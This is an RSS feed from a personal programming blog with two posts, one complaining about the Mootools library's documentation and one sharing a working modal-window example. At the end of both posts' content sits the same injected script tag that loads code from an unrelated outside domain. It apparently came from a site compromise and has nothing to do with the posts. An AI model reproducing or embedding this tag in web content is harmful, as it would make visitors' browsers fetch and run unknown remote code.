<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Moose56 blog &#187; Javascript</title>
	<atom:link href="http://moose56.com/blog/category/javascript/feed/" rel="self" type="application/rss+xml" />
	<link>http://moose56.com/blog</link>
	<description>/pictures, code and word</description>
	<lastBuildDate>Fri, 09 Apr 2010 13:58:20 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>Mootools and its documentation</title>
		<link>http://moose56.com/blog/2008/02/14/a-very-unproductive-day-with-mootools-and-its-documentation/</link>
		<comments>http://moose56.com/blog/2008/02/14/a-very-unproductive-day-with-mootools-and-its-documentation/#comments</comments>
		<pubDate>Thu, 14 Feb 2008 19:23:39 +0000</pubDate>
		<dc:creator>moose56</dc:creator>
				<category><![CDATA[Javascript]]></category>
		<category><![CDATA[Web]]></category>

		<guid isPermaLink="false">http://moose56.com/blog/2008/02/14/a-very-unproductive-day-with-mootools-and-its-documentation/</guid>
		<description><![CDATA[So today I was trying to update my moose56.com homepage and thought I would add some javascript effects using the Mootools library. I have used the Script.aculo.us library before, but I thought I would try out Mootools as it has a really nice object orientated design. Now I don&#8217;t know if its just me, but [...]]]></description>
			<content:encoded><![CDATA[<p>So today I was trying to update my moose56.com homepage and thought I would add some javascript effects using the Mootools library.</p>
<p><span id="more-19"></span></p>
<p>I have used the <a href="http://script.aculo.us/">Script.aculo.us</a> library before, but I thought I would try out <a href="http://mootools.net/">Mootools</a> as it has a really nice object orientated design.</p>
<p>Now I don&#8217;t know if its just me, but I can&#8217;t make any sense of the documentation to the extent that I can only get things to work by following the examples which is fine until I can&#8217;t fine an example for what I need.</p>
<p>Where the documentations messes me up is that when I create an object I want to know its parameters and its methods. Now it does tell you all of this, but I really can&#8217;t see it clearly. If you are used to the Java or Ruby or any other programming documentation you will be very confused.</p>
<p>Anyway, hopefully I will figure it out eventually, maybe I am just a douche.</p>
<p><script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://moose56.com/blog/2008/02/14/a-very-unproductive-day-with-mootools-and-its-documentation/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>CSS &amp; Javascript modal windows</title>
		<link>http://moose56.com/blog/2007/05/16/css-javascript-modal-windows/</link>
		<comments>http://moose56.com/blog/2007/05/16/css-javascript-modal-windows/#comments</comments>
		<pubDate>Wed, 16 May 2007 17:36:00 +0000</pubDate>
		<dc:creator>moose56</dc:creator>
				<category><![CDATA[CSS]]></category>
		<category><![CDATA[Javascript]]></category>

		<guid isPermaLink="false">http://moose56.com/blog/?p=13</guid>
		<description><![CDATA[I have been trying to set up a modal window on a web site like the one used by wayfaring.com for a login window. A little searching turned up a few different implementations an I picked Pj Hyett&#8217;s as he was the person to make the wayfaring.com one. The reason I am blogging about it [...]]]></description>
			<content:encoded><![CDATA[<p>I have been trying to set up a modal window on a web site like the one used by <a href="http://www.wayfaring.com/">wayfaring.com</a> for a login window.</p>
<p>A little searching turned up a few different implementations an I picked <a href="http://www.pjhyett.com/posts/190-the-lightbox-effect-without-lightbox">Pj Hyett&#8217;s</a> as he was the person to make the wayfaring.com one.</p>
<p>The reason I am blogging about it is that a few people commented on the PJ Hyett blog that they could not get it working so I am posting a zip file of a working example <a href='http://65.38.103.130/~moose56/blog/wp-content/uploads/2008/02/modal_window.zip' title='modal_window'>here</a>.<script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://moose56.com/blog/2007/05/16/css-javascript-modal-windows/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
	</channel>
</rss>
